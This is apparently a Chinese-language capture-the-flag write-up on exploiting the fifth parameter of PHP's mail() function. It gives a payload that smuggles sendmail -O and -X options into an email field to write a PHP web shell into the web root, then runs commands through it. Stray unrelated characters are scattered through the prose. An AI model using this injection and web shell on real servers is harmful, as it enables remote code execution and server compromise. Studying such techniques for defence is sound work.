利用mail函數(shù)可以使攻擊者達(dá)到遠(yuǎn)程代碼執(zhí)行權(quán)限以及其他惡意目的。
0x00獲取源碼
第一步訪問(wèn)/.index.php.swp源碼找到泄露的源碼蝙昙,主要功能代碼大致如下。
if(isset($_POST['submit'])){
$email = isset($_POST['email'])?trim($_POST['email']):'';
$title = isset($_POST['title'])?trim($_POST['title']):'';
$content = isset($_POST['content'])?trim($_POST['content']):'';
if(chkEmail($email) && chkTitle($title) && chkContent($content)){
$to = 'ambulong@vulnspy.com';
$subject = "收到來(lái)自 {$email} 的留言";
$msg = "{$title}\n{$content}\nFrom: {$email}";
$headers = 'From: ' . $email . "\r\n" .
'Reply-To: ' . $email . "\r\n" .
'X-Mailer: PHP/' . phpversion();
$options = sprintf('-f%s', $email);
if(mail($to, $subject, $msg, $headers, $options)){
echo "發(fā)送成功";
}else{
echo "發(fā)送失敗";
}
}
exit;
}
0x01mail函數(shù)分析
mail函數(shù)
mail函數(shù)用于從PHP應(yīng)用程序發(fā)送電子郵件,包括五個(gè)參數(shù)佳头。
bool mail ( string $to , string $subject , string $message [, string $additional_headers [, string $additional_parameters ]] )
其參數(shù)描述如下:
參數(shù)名 | 描述 |
---|---|
to | 郵件的接收者 |
subject | 郵件的主題 |
message | 發(fā)送的消息 |
headers | 額外的報(bào)頭 |
parameters | 程序的額外參數(shù) |
其中第五個(gè)參數(shù)的描述為:
The additional_parameters parameter can be used to pass additional flags as command line options to the program configured to be used when sending mail, as defined by the sendmail_path configuration setting. For example, this can be used to set the envelope sender address when using sendmail with the -f sendmail option.
This parameter is escaped by escapeshellcmd() internally to prevent command execution. escapeshellcmd() prevents command execution, but allows to add additional parameters. For security reasons, it is recommended for the user to sanitize this parameter to avoid adding unwanted parameters to the shell command.
通常间影,該參數(shù)被web應(yīng)用用來(lái)設(shè)置發(fā)送者的地址注竿,例如:-f miao@abc.com
。mail函數(shù)會(huì)被系統(tǒng)中的 /usr/bin/sendmail 程序調(diào)用魂贬,該程序由郵件傳輸代理軟件安裝在系統(tǒng)上巩割,是用來(lái)發(fā)送郵件的接口。sendmail命令會(huì)在系統(tǒng)shell的幫助下執(zhí)行付燥。
攻擊向量
sendmail 的第五個(gè)參數(shù)可以通過(guò) *-O* 宣谈、*-X* 、*-C* 參數(shù)導(dǎo)致任意文件讀寫(xiě)键科。
-OQueueDirectory=/tmp 選擇一個(gè)可以寫(xiě)的目錄保存臨時(shí)文件
-X/tmp/log.txt 保存日志文件到任意目錄
其中-OQueueDirectory=/tmp
可以簡(jiǎn)寫(xiě)為-oQ/tmp/
闻丑;
-X
參數(shù)也可以接受相對(duì)路徑漩怎,例如-X ./log.txt
。
0x02漏洞利用
回到原題嗦嗡,觀察源碼中的這兩行勋锤,$options
參數(shù)是用戶可控的,為-f
拼接用戶填寫(xiě)的email字段侥祭。
$options = sprintf('-f%s', $email);
if(mail($to, $subject, $msg, $headers, $options)){...}
構(gòu)造POST參數(shù)如下(其中web根目錄是按照常理猜測(cè)的叁执,構(gòu)造相對(duì)路徑也可):
email=miao@126.com -OQueueDirectory=/tmp -X/var/www/html/black.php
content=<?php system($_GET["black"]); ?>
然后訪問(wèn)/black.php?black=command
,最后讀取flag.php
文件矮冬。
參考:drops.blbana.cc徒恋;http://www.php.net/manual/en/function.mail.php;http://www.360zhijia.com/360anquanke/197210.html